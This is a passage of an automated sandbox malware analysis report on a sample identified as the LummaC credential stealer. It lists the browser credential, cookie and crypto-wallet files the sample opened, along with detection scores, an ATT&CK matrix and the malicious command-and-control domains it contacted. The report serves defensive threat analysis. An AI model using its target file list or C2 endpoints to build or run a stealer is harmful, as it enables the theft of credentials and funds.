                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\ATJBEMHSSBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\ATJBEMHSSBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1355119722.000000000120A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1366561400.0000000001207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: random(2).exe PID: 6644, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: random(2).exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1293558753.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		1
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol31
                Data from Local System                		2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                random(2).exe56%VirustotalBrowse
                random(2).exe55%ReversingLabsWin32.Trojan.Symmi
                random(2).exe100%AviraTR/Crypt.XPACK.Gen

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://earthsymphzony.today:443/api100%Avira URL Cloudmalware
                https://earthsymphzony.today/apiEM100%Avira URL Cloudmalware
                https://earthsymphzony.today/apiV100%Avira URL Cloudmalware
                https://earthsymphzony.today/a100%Avira URL Cloudmalware
                https://earthsymphzony.today/m100%Avira URL Cloudmalware
                https://earthsymphzony.today:443/api&100%Avira URL Cloudmalware
                https://earthsymphzony.today/api100%Avira URL Cloudmalware
                http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                https://earthsymphzony.today/b100%Avira URL Cloudmalware
                https://earthsymphzony.today/100%Avira URL Cloudmalware
                https://earthsymphzony.today/api288100%Avira URL Cloudmalware
                https://earthsymphzony.today/apij100%Avira URL Cloudmalware
                https://earthsymphzony.today/a$100%Avira URL Cloudmalware
                https://bridge.sf0%Avira URL Cloudsafe
                https://earthsymphzony.today/apiy100%Avira URL Cloudmalware
                https://earthsymphzony.today/apic100%Avira URL Cloudmalware
                https://earthsymphzony.today/apix100%Avira URL Cloudmalware
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%Avira URL Cloudsafe
                dawtastream.bet100%Avira URL Cloudmalware
                https://earthsymphzony.today/apime100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                earthsymphzony.today
                		104.21.64.1
                		truetrue
                  		unknown
                  foresctwhispers.top
                  		unknown
                  		unknownfalse
                    		high
                    collapimga.fun
                    		unknown
                    		unknowntrue
                      		unknown
                      quietswtreams.life
                      		unknown
                      		unknowntrue
                        		unknown
                        tracnquilforest.life
                        		unknown
                        		unknownfalse
                          		high
                          strawpeasaen.fun
                          		unknown
                          		unknowntrue
                            		unknown
                            starrynsightsky.icu
                            		unknown
                            		unknowntrue
                              		unknown
                              seizedsentec.online
                              		unknown
                              		unknowntrue
                                		unknown
                                dawtastream.bet
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  starrynsightsky.icufalse
                                    		high
                                    foresctwhispers.topfalse
                                      		high
                                      https://earthsymphzony.today/apitrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      strawpeasaen.funfalse
                                        		high
                                        quietswtreams.lifefalse
                                          		high
                                          tracnquilforest.lifefalse
                                            		high
                                            dawtastream.bettrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            collapimga.funfalse
                                              		high
                                              seizedsentec.onlinefalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.cloudflare.com/learning/access-management/phishing-attack/random(2).exe, 00000000.00000003.1309766072.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/chrome_newtabrandom(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                        		high
                                                        https://earthsymphzony.today/apiEMrandom(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                          		high
                                                          https://earthsymphzony.today:443/apirandom(2).exetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://earthsymphzony.today/apiVrandom(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://earthsymphzony.today/brandom(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://earthsymphzony.today/arandom(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://x1.c.lencr.org/0random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drfalse
                                                            		high
                                                            http://x1.i.lencr.org/0random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrandom(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                                		high
                                                                https://www.cloudflare.com/3&random(2).exe, 00000000.00000003.1547185152.00000000011C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://earthsymphzony.today/random(2).exe, 00000000.00000003.1567247573.0000000005AE1000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allrandom(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://earthsymphzony.today:443/api&random(2).exe, 00000000.00000003.1567432553.0000000001232000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://www.invisalign.com/?utm_sourcerandom(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKCAB34A9C016C4162.dat.0.drfalse
                                                                        		high
                                                                        https://earthsymphzony.today/mrandom(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icorandom(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                                          		high
